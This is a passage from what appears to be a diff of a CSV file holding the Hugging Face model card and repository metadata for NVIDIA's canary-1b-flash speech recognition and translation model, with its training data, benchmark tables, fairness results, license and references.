#### French (1.8k hours)
|
| 447 |
+
- Mozilla Common Voice (v12.0) - 708 hour subset
|
| 448 |
+
- Multilingual Librispeech (MLS FR) - 926 hour subset
|
| 449 |
+
- VoxPopuli (FR) - 165 hour subset
|
| 450 |
+
|
| 451 |
+
|
| 452 |
+
## Evaluation Dataset:
|
| 453 |
+
|
| 454 |
+
**Data Collection Method:** <br>
|
| 455 |
+
* Human <br>
|
| 456 |
+
|
| 457 |
+
**Labeling Method:** <br>
|
| 458 |
+
* Human <br>
|
| 459 |
+
|
| 460 |
+
Automatic Speech Recognition:
|
| 461 |
+
* [HuggingFace OpenASR Leaderboard evaluation sets](https://huggingface.co/spaces/hf-audio/open_asr_leaderboard)
|
| 462 |
+
* [MLS](https://huggingface.co/datasets/facebook/multilingual_librispeech)
|
| 463 |
+
* [MCV] (https://commonvoice.mozilla.org/en/datasets)
|
| 464 |
+
|
| 465 |
+
Automatic Speech Translation:
|
| 466 |
+
* [FLEURS](https://huggingface.co/datasets/google/fleurs)
|
| 467 |
+
* [COVOST-v2](https://github.com/facebookresearch/covost)
|
| 468 |
+
* [mExpresso](https://huggingface.co/facebook/seamless-expressive#mexpresso-multilingual-expresso)
|
| 469 |
+
|
| 470 |
+
Timestamp Prediction:
|
| 471 |
+
* [Librispeech](https://www.openslr.org/12)
|
| 472 |
+
|
| 473 |
+
Hallucination Robustness:
|
| 474 |
+
* [MUSAN](https://www.openslr.org/17/) 48 hrs eval set
|
| 475 |
+
|
| 476 |
+
Noise Robustness:
|
| 477 |
+
* [Librispeech](https://www.openslr.org/12)
|
| 478 |
+
|
| 479 |
+
Model Fairness:
|
| 480 |
+
* [Casual Conversations Dataset](https://arxiv.org/abs/2104.02821)
|
| 481 |
+
|
| 482 |
+
## Training
|
| 483 |
+
|
| 484 |
+
Canary-1B-Flash is trained using the NVIDIA NeMo Framework [7] for a total of 200K steps with 2D bucketing [1] and optimal batch sizes set using OOMptimizer [8].The model is trained on 128 NVIDIA A100 80GB GPUs.
|
| 485 |
+
The model can be trained using this [example script](https://github.com/NVIDIA/NeMo/blob/main/examples/asr/speech_multitask/speech_to_text_aed.py) and [base config](https://github.com/NVIDIA/NeMo/blob/main/examples/asr/conf/speech_multitask/fast-conformer_aed.yaml).
|
| 486 |
+
|
| 487 |
+
The tokenizers for these models were built using the text transcripts of the train set with this [script](https://github.com/NVIDIA/NeMo/blob/main/scripts/tokenizers/process_asr_text_tokenizer.py).
|
| 488 |
+
|
| 489 |
+
## Inference:
|
| 490 |
+
**Engine:** NVIDIA NeMo <br>
|
| 491 |
+
**Test Hardware :** <br>
|
| 492 |
+
* A6000 <br>
|
| 493 |
+
* A100 <br>
|
| 494 |
+
* V100 <br>
|
| 495 |
+
|
| 496 |
+
## Performance
|
| 497 |
+
|
| 498 |
+
For ASR and AST experiments, predictions were generated using greedy decoding. Note that utterances shorter than 1 second are symmetrically zero-padded upto 1 second during evaluation.
|
| 499 |
+
|
| 500 |
+
### English ASR Performance (w/o PnC)
|
| 501 |
+
|
| 502 |
+
The ASR performance is measured with word error rate (WER), and we process the groundtruth and predicted text with [whisper-normalizer](https://pypi.org/project/whisper-normalizer/).
|
| 503 |
+
|
| 504 |
+
WER on [HuggingFace OpenASR leaderboard](https://huggingface.co/spaces/hf-audio/open_asr_leaderboard):
|
| 505 |
+
|
| 506 |
+
| **Version** | **Model** | **RTFx** | **AMI** | **GigaSpeech** | **LS Clean** | **LS Other** | **Earnings22** | **SPGISpech** | **Tedlium** | **Voxpopuli** |
|
| 507 |
+
|:---------:|:-----------:|:------:|:------:|:------:|:------:|:------:|:------:|:------:|:------:|:------:|
|
| 508 |
+
| nemo-main | canary-1b-flash | 1045.75 | 13.11 | 9.85 | 1.48 | 2.87 | 12.79 | 1.95 | 3.12 | 5.63 |
|
| 509 |
+
|
| 510 |
+
#### Inference speed on different systems
|
| 511 |
+
We profiled inference speed on the OpenASR benchmark (batch_size=128) using the [real-time factor](https://github.com/NVIDIA/DeepLearningExamples/blob/master/Kaldi/SpeechRecognition/README.md#metrics) (RTFx) to quantify throughput.
|
| 512 |
+
|
| 513 |
+
| **Version** | **Model** | **System** | **RTFx** |
|
| 514 |
+
|:-----------:|:-------------:|:------------:|:----------:|
|
| 515 |
+
| nemo-main | canary-1b-flash | NVIDIA A100 | 1045.75 |
|
| 516 |
+
| nemo-main | canary-1b-flash | NVIDIA H100 | 1669.07 |
|
| 517 |
+
|
| 518 |
+
|
| 519 |
+
|
| 520 |
+
### Multilingual ASR Performance
|
| 521 |
+
|
| 522 |
+
WER on [MLS](https://huggingface.co/datasets/facebook/multilingual_librispeech) test set:
|
| 523 |
+
|
| 524 |
+
| **Version** | **Model** | **De** | **Es** | **Fr** |
|
| 525 |
+
|:---------:|:-----------:|:------:|:------:|:------:|
|
| 526 |
+
| nemo-main | canary-1b-flash | 4.36 | 2.69 | 4.47 |
|
| 527 |
+
|
| 528 |
+
WER on [MCV-16.1](https://commonvoice.mozilla.org/en/datasets) test set:
|
| 529 |
+
| **Version** | **Model** | **En** | **De** | **Es** | **Fr** |
|
| 530 |
+
|:---------:|:-----------:|:------:|:------:|:------:|:------:|
|
| 531 |
+
| nemo-main | canary-1b-flash | 6.99 | 4.09 | 3.62 | 6.15 |
|
| 532 |
+
|
| 533 |
+
|
| 534 |
+
More details on evaluation can be found at [HuggingFace ASR Leaderboard](https://huggingface.co/spaces/hf-audio/open_asr_leaderboard)
|
| 535 |
+
|
| 536 |
+
### AST Performance
|
| 537 |
+
|
| 538 |
+
We evaluate AST performance with [BLEU score](https://lightning.ai/docs/torchmetrics/stable/text/sacre_bleu_score.html) and [COMET score](https://aclanthology.org/2020.emnlp-main.213/), and use native annotations with punctuation and capitalization in the datasets.
|
| 539 |
+
|
| 540 |
+
[FLEURS](https://huggingface.co/datasets/google/fleurs) test set:
|
| 541 |
+
|
| 542 |
+
BLEU score:
|
| 543 |
+
| **Version** | **Model** | **En->De** | **En->Es** | **En->Fr** | **De->En** | **Es->En** | **Fr->En** |
|
| 544 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|:----------:|:----------:|:----------:|
|
| 545 |
+
| nemo-main | canary-1b-flash | 32.27 | 22.6 | 41.22 | 35.5 | 23.32 | 33.42 |
|
| 546 |
+
|
| 547 |
+
COMET score:
|
| 548 |
+
| **Version** | **Model** | **En->De** | **En->Es** | **En->Fr** | **De->En** | **Es->En** | **Fr->En** |
|
| 549 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|:----------:|:----------:|:----------:|
|
| 550 |
+
| nemo-main | canary-1b-flash | 0.8114 | 0.8118 | 0.8165 | 0.8546 | 0.8228 | 0.8475 |
|
| 551 |
+
|
| 552 |
+
[COVOST-v2](https://github.com/facebookresearch/covost) test set:
|
| 553 |
+
|
| 554 |
+
BLEU score:
|
| 555 |
+
| **Version** | **Model** | **De->En** | **Es->En** | **Fr->En** |
|
| 556 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|
|
| 557 |
+
| nemo-main | canary-1b-flash | 39.33 | 41.86 | 41.43 |
|
| 558 |
+
|
| 559 |
+
COMET score:
|
| 560 |
+
| **Version** | **Model** | **De->En** | **Es->En** | **Fr->En** |
|
| 561 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|
|
| 562 |
+
| nemo-main | canary-1b-flash | 0.8553 | 0.8585 | 0.8511 |
|
| 563 |
+
|
| 564 |
+
[mExpresso](https://huggingface.co/facebook/seamless-expressive#mexpresso-multilingual-expresso) test set:
|
| 565 |
+
|
| 566 |
+
BLEU score:
|
| 567 |
+
| **Version** | **Model** | **En->De** | **En->Es** | **En->Fr** |
|
| 568 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|
|
| 569 |
+
| nemo-main | canary-1b-flash | 22.91 | 35.69 | 27.85 |
|
| 570 |
+
|
| 571 |
+
COMET score:
|
| 572 |
+
| **Version** | **Model** | **En->De** | **En->Es** | **En->Fr** |
|
| 573 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|
|
| 574 |
+
| nemo-main | canary-1b-flash | 0.7889 | 0.8211 | 0.7910 |
|
| 575 |
+
|
| 576 |
+
### Timestamp Prediction
|
| 577 |
+
F1-score on [Librispeech Test sets](https://www.openslr.org/12) at collar value of 200ms
|
| 578 |
+
| **Version** | **Model** | **test-clean** | **test-other** |
|
| 579 |
+
|:-----------:|:---------:|:----------:|:----------:|
|
| 580 |
+
| nemo-main | canary-1b-flash | 95.5 | 93.5 |
|
| 581 |
+
|
| 582 |
+
|
| 583 |
+
### Hallucination Robustness
|
| 584 |
+
Number of characters per minute on [MUSAN](https://www.openslr.org/17) 48 hrs eval set
|
| 585 |
+
| **Version** | **Model** | **# of character per minute** |
|
| 586 |
+
|:-----------:|:---------:|:----------:|
|
| 587 |
+
| nemo-main | canary-1b-flash | 60.92 |
|
| 588 |
+
|
| 589 |
+
### Noise Robustness
|
| 590 |
+
WER on [Librispeech Test Clean](https://www.openslr.org/12) at different SNR (signal to noise ratio) levels of additive white noise
|
| 591 |
+
|
| 592 |
+
| **Version** | **Model** | **SNR 10** | **SNR 5** | **SNR 0** | **SNR -5** |
|
| 593 |
+
|:-----------:|:---------:|:----------:|:----------:|:----------:|:----------:|
|
| 594 |
+
| nemo-main | canary-1b-flash | 2.34 | 3.69 | 8.84 | 29.71 |
|
| 595 |
+
|
| 596 |
+
## Model Fairness Evaluation
|
| 597 |
+
|
| 598 |
+
As outlined in the paper ""Towards Measuring Fairness in AI: the Casual Conversations Dataset"" [9], we assessed the canary-1b-flash model for fairness. The model was evaluated on the CausalConversations-v1 dataset, and the results are reported as follows:
|
| 599 |
+
|
| 600 |
+
### Gender Bias:
|
| 601 |
+
|
| 602 |
+
| Gender | Male | Female | N/A | Other |
|
| 603 |
+
| :--- | :--- | :--- | :--- | :--- |
|
| 604 |
+
| Num utterances | 19325 | 24532 | 926 | 33 |
|
| 605 |
+
| % WER | 14.66 | 12.44 | 17.17 | 27.56 |
|
| 606 |
+
|
| 607 |
+
### Age Bias:
|
| 608 |
+
|
| 609 |
+
| Age Group | (18-30) | (31-45) | (46-85) | (1-100) |
|
| 610 |
+
| :--- | :--- | :--- | :--- | :--- |
|
| 611 |
+
| Num utterances | 15956 | 14585 | 13349 | 43890 |
|
| 612 |
+
| % WER | 13.18 | 13.45 | 13.64 | 13.41 |
|
| 613 |
+
|
| 614 |
+
(Error rates for fairness evaluation are determined by normalizing both the reference and predicted text, similar to the methods used in the evaluations found at https://github.com/huggingface/open_asr_leaderboard.)
|
| 615 |
+
|
| 616 |
+
## License/Terms of Use:
|
| 617 |
+
canary-1b-flash is released under the CC-BY-4.0 license. By using this model, you are agreeing to the [terms and conditions](https://choosealicense.com/licenses/cc-by-4.0/) of the license. <br>
|
| 618 |
+
|
| 619 |
+
## References:
|
| 620 |
+
[1] [Training and Inference Efficiency of Encoder-Decoder Speech Models](https://arxiv.org/abs/2503.05931)
|
| 621 |
+
|
| 622 |
+
[2] [Less is More: Accurate Speech Recognition & Translation without Web-Scale Data](https://www.isca-archive.org/interspeech_2024/puvvada24_interspeech.pdf)
|
| 623 |
+
|
| 624 |
+
[3] [Fast Conformer with Linearly Scalable Attention for Efficient Speech Recognition](https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=10389701)
|
| 625 |
+
|
| 626 |
+
[4] [Attention is All You Need](https://arxiv.org/abs/1706.03762)
|
| 627 |
+
|
| 628 |
+
[5] [Unified Model for Code-Switching Speech Recognition and Language Identification Based on Concatenated Tokenizer](https://aclanthology.org/2023.calcs-1.7.pdf)
|
| 629 |
+
|
| 630 |
+
[6] [Google Sentencepiece Tokenizer](https://github.com/google/sentencepiece)
|
| 631 |
+
|
| 632 |
+
[7] [NVIDIA NeMo Framework](https://github.com/NVIDIA/NeMo)
|
| 633 |
+
|
| 634 |
+
[8] [EMMeTT: Efficient Multimodal Machine Translation Training](https://arxiv.org/abs/2409.13523)
|
| 635 |
+
|
| 636 |
+
[9] [Towards Measuring Fairness in AI: the Casual Conversations Dataset](https://ieeexplore.ieee.org/stamp/stamp.jsp?arnumber=9634168)
|
| 637 |
+
|
| 638 |
+
|
| 639 |
+
## Ethical Considerations:
|
| 640 |
+
NVIDIA believes Trustworthy AI is a shared responsibility and we have established policies and practices to enable development for a wide array of AI applications. When downloaded or used in accordance with our terms of service, developers should work with their internal model team to ensure this model meets requirements for the relevant industry and use case and addresses unforeseen product misuse.
|
| 641 |
+
Please report security vulnerabilities or NVIDIA AI Concerns [here](https://www.nvidia.com/en-us/support/submit-security-vulnerability/).","{""id"": ""nvidia/canary-1b-flash"", ""author"": ""nvidia"", ""sha"": ""dcb25300f314472d4632dc6f111bcd63b1f436b1"", ""last_modified"": ""2025-03-18 23:42:31+00:00"", ""created_at"": ""2025-03-07 22:29:17+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 118870, ""downloads_all_time"": null, ""likes"": 186, ""library_name"": ""nemo"", ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""nemo"", ""automatic-speech-recognition"", ""automatic-speech-translation"", ""speech"", ""audio"", ""Transformer"", ""FastConformer"", ""Conformer"", ""pytorch"", ""NeMo"", ""hf-asr-leaderboard"", ""en"", ""de"", ""es"", ""fr"", ""dataset:librispeech_asr"", ""dataset:fisher_corpus"", ""dataset:Switchboard-1"", ""dataset:WSJ-0"", ""dataset:WSJ-1"", ""dataset:National-Singapore-Corpus-Part-1"", ""dataset:National-Singapore-Corpus-Part-6"", ""dataset:vctk"", ""dataset:voxpopuli"", ""dataset:europarl"", ""dataset:multilingual_librispeech"", ""dataset:mozilla-foundation/common_voice_8_0"", ""dataset:MLCommons/peoples_speech"", ""arxiv:2104.02821"", ""arxiv:2503.05931"", ""arxiv:1706.03762"", ""arxiv:2409.13523"", ""license:cc-by-4.0"", ""model-index"", ""region:us""], ""pipeline_tag"": ""automatic-speech-recognition"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- librispeech_asr\n- fisher_corpus\n- Switchboard-1\n- WSJ-0\n- WSJ-1\n- National-Singapore-Corpus-Part-1\n- National-Singapore-Corpus-Part-6\n- vctk\n- voxpopuli\n- europarl\n- multilingual_librispeech\n- mozilla-foundation/common_voice_8_0\n- MLCommons/peoples_speech\nlanguage:\n- en\n- de\n- es\n- fr\nlibrary_name: nemo\nlicense: cc-by-4.0\nmetrics:\n- wer\n- bleu\n- comet\npipeline_tag: automatic-speech-recognition\ntags:\n- automatic-speech-recognition\n- automatic-speech-translation\n- speech\n- audio\n- Transformer\n- FastConformer\n- Conformer\n- pytorch\n- NeMo\n- hf-asr-leaderboard\nwidget:\n- example_title: Librispeech sample 1\n src: https://cdn-media.huggingface.co/speech_samples/sample1.flac\n- example_title: Librispeech sample 2\n src: https://cdn-media.huggingface.co/speech_samples/sample2.flac\nmodel-index:\n- name: canary-1b-flash\n results:\n - task:\n type: automatic-speech-recognition\n name: Automatic Speech Recognition\n dataset:\n name: LibriSpeech (other)\n type: librispeech_asr\n config: other\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 2.87\n name: Test WER\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: SPGI Speech\n type: kensho/spgispeech\n config: test\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 1.95\n name: Test WER\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: en\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 6.99\n name: Test WER (En)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: de\n split: test\n args:\n language: de\n metrics:\n - type: wer\n value: 4.09\n name: Test WER (De)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: es\n split: test\n args:\n language: es\n metrics:\n - type: wer\n value: 3.62\n name: Test WER (ES)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: fr\n split: test\n args:\n language: fr\n metrics:\n - type: wer\n value: 6.15\n name: Test WER (Fr)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: en_us\n split: test\n args:\n language: en-de\n metrics:\n - type: bleu\n value: 32.27\n name: Test BLEU (En->De)\n verified: false\n - type: bleu\n value: 22.6\n name: Test BLEU (En->Es)\n verified: false\n - type: bleu\n value: 41.22\n name: Test BLEU (En->Fr)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: de_de\n split: test\n args:\n language: de-en\n metrics:\n - type: bleu\n value: 35.5\n name: Test BLEU (De->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: es_419\n split: test\n args:\n language: es-en\n metrics:\n - type: bleu\n value: 23.32\n name: Test BLEU (Es->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: fr_fr\n split: test\n args:\n language: fr-en\n metrics:\n - type: bleu\n value: 33.42\n name: Test BLEU (Fr->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: de_de\n split: test\n args:\n language: de-en\n metrics:\n - type: bleu\n value: 39.33\n name: Test BLEU (De->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: es_419\n split: test\n args:\n language: es-en\n metrics:\n - type: bleu\n value: 41.86\n name: Test BLEU (Es->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: fr_fr\n split: test\n args:\n language: fr-en\n metrics:\n - type: bleu\n value: 41.43\n name: Test BLEU (Fr->En)\n verified: false"", ""widget_data"": [{""example_title"": ""Librispeech sample 1"", ""src"": ""https://cdn-media.huggingface.co/speech_samples/sample1.flac""}, {""example_title"": ""Librispeech sample 2"", ""src"": ""https://cdn-media.huggingface.co/speech_samples/sample2.flac""}], ""model_index"": [{""name"": ""canary-1b-flash"", ""results"": [{""task"": {""name"": ""Automatic Speech Recognition"", ""type"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""LibriSpeech (other)"", ""type"": ""librispeech_asr"", ""config"": ""other"", ""split"": ""test"", ""args"": {""language"": ""en""}}, ""metrics"": [{""name"": ""Test WER"", ""type"": ""wer"", ""value"": 2.87, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Recognition"", ""name"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""SPGI Speech"", ""type"": ""kensho/spgispeech"", ""config"": ""test"", ""split"": ""test"", ""args"": {""language"": ""en""}}, ""metrics"": [{""name"": ""Test WER"", ""type"": ""wer"", ""value"": 1.95, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Recognition"", ""name"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""Mozilla Common Voice 16.1"", ""type"": ""mozilla-foundation/common_voice_16_1"", ""config"": ""en"", ""split"": ""test"", ""args"": {""language"": ""en""}}, ""metrics"": [{""name"": ""Test WER (En)"", ""type"": ""wer"", ""value"": 6.99, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Recognition"", ""name"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""Mozilla Common Voice 16.1"", ""type"": ""mozilla-foundation/common_voice_16_1"", ""config"": ""de"", ""split"": ""test"", ""args"": {""language"": ""de""}}, ""metrics"": [{""name"": ""Test WER (De)"", ""type"": ""wer"", ""value"": 4.09, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Recognition"", ""name"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""Mozilla Common Voice 16.1"", ""type"": ""mozilla-foundation/common_voice_16_1"", ""config"": ""es"", ""split"": ""test"", ""args"": {""language"": ""es""}}, ""metrics"": [{""name"": ""Test WER (ES)"", ""type"": ""wer"", ""value"": 3.62, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Recognition"", ""name"": ""automatic-speech-recognition""}, ""dataset"": {""name"": ""Mozilla Common Voice 16.1"", ""type"": ""mozilla-foundation/common_voice_16_1"", ""config"": ""fr"", ""split"": ""test"", ""args"": {""language"": ""fr""}}, ""metrics"": [{""name"": ""Test WER (Fr)"", ""type"": ""wer"", ""value"": 6.15, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""en_us"", ""split"": ""test"", ""args"": {""language"": ""en-de""}}, ""metrics"": [{""name"": ""Test BLEU (En->De)"", ""type"": ""bleu"", ""value"": 32.27, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""en_us"", ""split"": ""test"", ""args"": {""language"": ""en-de""}}, ""metrics"": [{""name"": ""Test BLEU (En->Es)"", ""type"": ""bleu"", ""value"": 22.6, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""en_us"", ""split"": ""test"", ""args"": {""language"": ""en-de""}}, ""metrics"": [{""name"": ""Test BLEU (En->Fr)"", ""type"": ""bleu"", ""value"": 41.22, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""de_de"", ""split"": ""test"", ""args"": {""language"": ""de-en""}}, ""metrics"": [{""name"": ""Test BLEU (De->En)"", ""type"": ""bleu"", ""value"": 35.5, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""es_419"", ""split"": ""test"", ""args"": {""language"": ""es-en""}}, ""metrics"": [{""name"": ""Test BLEU (Es->En)"", ""type"": ""bleu"", ""value"": 23.32, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""FLEURS"", ""type"": ""google/fleurs"", ""config"": ""fr_fr"", ""split"": ""test"", ""args"": {""language"": ""fr-en""}}, ""metrics"": [{""name"": ""Test BLEU (Fr->En)"", ""type"": ""bleu"", ""value"": 33.42, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""COVOST"", ""type"": ""covost2"", ""config"": ""de_de"", ""split"": ""test"", ""args"": {""language"": ""de-en""}}, ""metrics"": [{""name"": ""Test BLEU (De->En)"", ""type"": ""bleu"", ""value"": 39.33, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""COVOST"", ""type"": ""covost2"", ""config"": ""es_419"", ""split"": ""test"", ""args"": {""language"": ""es-en""}}, ""metrics"": [{""name"": ""Test BLEU (Es->En)"", ""type"": ""bleu"", ""value"": 41.86, ""verified"": false}]}, {""task"": {""type"": ""Automatic Speech Translation"", ""name"": ""automatic-speech-translation""}, ""dataset"": {""name"": ""COVOST"", ""type"": ""covost2"", ""config"": ""fr_fr"", ""split"": ""test"", ""args"": {""language"": ""fr-en""}}, ""metrics"": [{""name"": ""Test BLEU (Fr->En)"", ""type"": ""bleu"", ""value"": 41.43, ""verified"": false}]}]}], ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='canary-1b-flash.nemo', size=None, blob_id=None, lfs=None)""], ""spaces"": [""nvidia/canary-1b-flash"", ""Huggingfacest/canary-180m-flash""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-03-18 23:42:31+00:00"", ""cardData"": ""datasets:\n- librispeech_asr\n- fisher_corpus\n- Switchboard-1\n- WSJ-0\n- WSJ-1\n- National-Singapore-Corpus-Part-1\n- National-Singapore-Corpus-Part-6\n- vctk\n- voxpopuli\n- europarl\n- multilingual_librispeech\n- mozilla-foundation/common_voice_8_0\n- MLCommons/peoples_speech\nlanguage:\n- en\n- de\n- es\n- fr\nlibrary_name: nemo\nlicense: cc-by-4.0\nmetrics:\n- wer\n- bleu\n- comet\npipeline_tag: automatic-speech-recognition\ntags:\n- automatic-speech-recognition\n- automatic-speech-translation\n- speech\n- audio\n- Transformer\n- FastConformer\n- Conformer\n- pytorch\n- NeMo\n- hf-asr-leaderboard\nwidget:\n- example_title: Librispeech sample 1\n src: https://cdn-media.huggingface.co/speech_samples/sample1.flac\n- example_title: Librispeech sample 2\n src: https://cdn-media.huggingface.co/speech_samples/sample2.flac\nmodel-index:\n- name: canary-1b-flash\n results:\n - task:\n type: automatic-speech-recognition\n name: Automatic Speech Recognition\n dataset:\n name: LibriSpeech (other)\n type: librispeech_asr\n config: other\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 2.87\n name: Test WER\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: SPGI Speech\n type: kensho/spgispeech\n config: test\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 1.95\n name: Test WER\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: en\n split: test\n args:\n language: en\n metrics:\n - type: wer\n value: 6.99\n name: Test WER (En)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: de\n split: test\n args:\n language: de\n metrics:\n - type: wer\n value: 4.09\n name: Test WER (De)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: es\n split: test\n args:\n language: es\n metrics:\n - type: wer\n value: 3.62\n name: Test WER (ES)\n verified: false\n - task:\n type: Automatic Speech Recognition\n name: automatic-speech-recognition\n dataset:\n name: Mozilla Common Voice 16.1\n type: mozilla-foundation/common_voice_16_1\n config: fr\n split: test\n args:\n language: fr\n metrics:\n - type: wer\n value: 6.15\n name: Test WER (Fr)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: en_us\n split: test\n args:\n language: en-de\n metrics:\n - type: bleu\n value: 32.27\n name: Test BLEU (En->De)\n verified: false\n - type: bleu\n value: 22.6\n name: Test BLEU (En->Es)\n verified: false\n - type: bleu\n value: 41.22\n name: Test BLEU (En->Fr)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: de_de\n split: test\n args:\n language: de-en\n metrics:\n - type: bleu\n value: 35.5\n name: Test BLEU (De->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: es_419\n split: test\n args:\n language: es-en\n metrics:\n - type: bleu\n value: 23.32\n name: Test BLEU (Es->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: FLEURS\n type: google/fleurs\n config: fr_fr\n split: test\n args:\n language: fr-en\n metrics:\n - type: bleu\n value: 33.42\n name: Test BLEU (Fr->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: de_de\n split: test\n args:\n language: de-en\n metrics:\n - type: bleu\n value: 39.33\n name: Test BLEU (De->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: es_419\n split: test\n args:\n language: es-en\n metrics:\n - type: bleu\n value: 41.86\n name: Test BLEU (Es->En)\n verified: false\n - task:\n type: Automatic Speech Translation\n name: automatic-speech-translation\n dataset:\n name: COVOST\n type: covost2\n config: fr_fr\n split: test\n args:\n language: fr-en\n metrics:\n - type: bleu\n value: 41.43\n name: Test BLEU (Fr->En)\n verified: false"", ""transformersInfo"": null, ""_id"": ""67cb733d42ae7a25491e3700"", ""modelId"": ""nvidia/canary-1b-flash"", ""usedStorage"": 3540715520}",0,,0,,0,,0,,0,"Huggingfacest/canary-180m-flash, hf-audio/open_asr_leaderboard, huggingface/InferenceSupport/discussions/89, nvidia/canary-1b-flash",4
|
chatgpt_paraphraser_on_T5_base_finetunes_20250426_221535.csv_finetunes_20250426_221535.csv
ADDED
|
@@ -0,0 +1,333 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
